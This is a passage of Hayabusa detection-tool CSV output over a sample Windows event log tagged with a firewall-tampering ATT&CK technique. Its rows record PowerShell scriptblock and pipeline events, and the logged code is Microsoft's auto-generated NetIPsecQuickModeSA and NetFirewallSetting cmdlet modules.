[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias 
'*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.499 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias 
'*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.500 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.500 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.501 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.501 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function 
